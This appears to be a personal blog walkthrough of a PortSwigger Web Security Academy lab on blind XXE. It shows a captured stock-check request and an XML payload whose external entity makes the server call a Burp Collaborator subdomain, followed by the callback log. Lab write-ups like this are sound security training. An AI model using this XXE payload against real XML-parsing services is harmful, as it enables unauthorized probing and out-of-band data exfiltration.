Skip to content

chojnowski.it

Port Swigger Blind XXE with out of band interactio

Port Swigger Blind XXE with out of band interactio

Solution¶

Open website: https://0ad5004204221d4b825434dd003f00a2.web-security-academy.net/product?productId=1¶

Open website and check stock
---
POST /product/stock HTTP/2
Host: 0ad5004204221d4b825434dd003f00a2.web-security-academy.net
Cookie: session=zLTIqmWbtu9QGZEDjNoaAhx7EyNznXan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0ad5004204221d4b825434dd003f00a2.web-security-academy.net/product?productId=1
Content-Type: application/xml
Content-Length: 107
Origin: https://0ad5004204221d4b825434dd003f00a2.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>

Generate subdomain from Collabolator¶

Subdomain: d0e6wo4fx1m6i0q1sxqb2abg97fy3rrg.oastify.com

Create a new payload¶

Old payload

<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>
---
New payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE exploit [ <!ENTITY xxe SYSTEM "http://d0e6wo4fx1m6i0q1sxqb2abg97fy3rrg.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>
2</storeId></stockCheck>

Check result from Collaborator¶

The Collaborator server received an HTTP request.  The request was received from IP address 34.253.173.2:37342 at 2026-Jan-12 11:56:58.826 UTC.

Solved¶